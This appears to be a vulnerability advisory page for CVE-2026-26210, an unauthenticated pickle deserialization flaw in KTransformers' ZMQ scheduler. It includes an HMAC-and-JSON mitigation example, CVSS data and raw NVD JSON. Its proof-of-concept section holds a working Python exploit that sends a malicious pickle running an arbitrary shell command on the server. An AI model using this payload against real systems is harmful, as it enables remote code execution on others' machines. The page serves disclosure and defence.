Security Vulnerability Report
CVE-2026-26210 CVSS 9.8 CRITICAL

CVE-2026-26210

Published: 2026-04-23 22:16:26
Last Modified: 2026-05-05 14:43:29

Description

KTransformers through 0.5.3 contains an unsafe deserialization vulnerability in the balance_serve backend mode where the scheduler RPC server binds a ZMQ ROUTER socket to all interfaces with no authentication and deserializes incoming messages using pickle.loads() without validation. Attackers can send a crafted pickle payload to the exposed ZMQ socket to execute arbitrary code on the server with the privileges of the ktransformers process.
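
A receive path that avoids both conditions named in the description, as an added example that is not KTransformers code or the upstream patch: each frame carries an HMAC-SHA256 tag that is checked before any parsing, and the body is JSON rather than pickle. The method names, shared-key handling and tag-then-body frame layout are assumptions made for illustration.

```python
import hashlib
import hmac
import json
import pickle

TAG_LEN = 32  # length of an HMAC-SHA256 tag in bytes
ALLOWED_METHODS = {"add_query", "cancel_query"}  # hypothetical RPC names

class RejectedFrame(Exception):
    """A frame that failed authentication or validation."""

def sign(key: bytes, body: bytes) -> bytes:
    """Prefix body with its HMAC-SHA256 tag (assumed frame layout)."""
    return hmac.new(key, body, hashlib.sha256).digest() + body

def encode_request(key: bytes, method: str, params: dict) -> bytes:
    return sign(key, json.dumps({"method": method, "params": params}).encode())

def decode_request(key: bytes, frame: bytes) -> dict:
    """Authenticate first, then parse with a decoder that cannot run code."""
    tag, body = frame[:TAG_LEN], frame[TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise RejectedFrame("bad authentication tag")
    try:
        msg = json.loads(body)  # never pickle.loads() on network input
    except ValueError as exc:  # JSONDecodeError and UnicodeDecodeError
        raise RejectedFrame("body is not JSON") from exc
    method = msg.get("method") if isinstance(msg, dict) else None
    if not isinstance(method, str) or method not in ALLOWED_METHODS:
        raise RejectedFrame("method not allowed")
    if not isinstance(msg.get("params"), dict):
        raise RejectedFrame("params must be an object")
    return msg

def is_rejected(key: bytes, frame: bytes) -> bool:
    try:
        decode_request(key, frame)
    except RejectedFrame:
        return True
    return False

if __name__ == "__main__":
    key = b"constructed-demo-key-not-a-secret"
    blob = pickle.dumps({"method": "add_query"})  # constructed, harmless pickle
    print(decode_request(key, encode_request(key, "add_query", {"n": 1})))
    print(is_rejected(key, blob), is_rejected(key, sign(key, blob)))
```

Binding the socket to a loopback or private address instead of all interfaces is a separate, complementary change. The tag authenticates the sender but does not prevent replay; a nonce in the body or ZeroMQ's CURVE transport security covers that.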

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:kvcache-ai:ktransformers:*:*:*:*:*:*:*:* - VULNERABLE
KTransformers <= 0.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import zmq
import pickle
import os


def generate_payload(command):
    """Generates a malicious pickle payload."""
    class Exploit(object):
        def __reduce__(self):
            # Execute the command on the target system
            return (os.system, (command,))
    return pickle.dumps(Exploit())


def send_exploit(target_ip, target_port, command):
    """Sends the exploit to the vulnerable ZMQ server."""
    context = zmq.Context()
    # Use DEALER socket to connect to ROUTER
    socket = context.socket(zmq.DEALER)
    socket.connect(f"tcp://{target_ip}:{target_port}")
    print(f"[*] Sending payload: {command}")
    payload = generate_payload(command)
    socket.send(payload)
    print("[+] Payload sent.")
    socket.close()
    context.term()


if __name__ == "__main__":
    # Replace with actual target IP and Port
    TARGET_IP = "127.0.0.1"
    TARGET_PORT = 5555
    COMMAND = "touch /tmp/pwned"
    send_exploit(TARGET_IP, TARGET_PORT, COMMAND)
```

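References

https://chocapikk.com/posts/2026/ktransformers-pickle-rce/ (Exploit, Mitigation, Third Party Advisory)
https://github.com/kvcache-ai/ktransformers/pull/1944 (Issue Tracking, Patch)
https://www.vulncheck.com/advisories/ktransformers-unsafe-deserialization-rce-via-balance-serve (Third Party Advisory)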

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-26210", "sourceIdentifier": "[email protected]", "published": "2026-04-23T22:16:26.400", "lastModified": "2026-05-05T14:43:28.873", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "KTransformers through 0.5.3 contains an unsafe deserialization vulnerability in the balance_serve backend mode where the scheduler RPC server binds a ZMQ ROUTER socket to all interfaces with no authentication and deserializes incoming messages using pickle.loads() without validation. Attackers can send a crafted pickle payload to the exposed ZMQ socket to execute arbitrary code on the server with the privileges of the ktransformers process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kvcache-ai:ktransformers:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.5.3", "matchCriteriaId": "D4AAFB24-76AB-4600-9264-67B2445CA09C"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2026/ktransformers-pickle-rce/", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://github.com/kvcache-ai/ktransformers/pull/1944", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://www.vulncheck.com/advisories/ktransformers-unsafe-deserialization-rce-via-balance-serve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}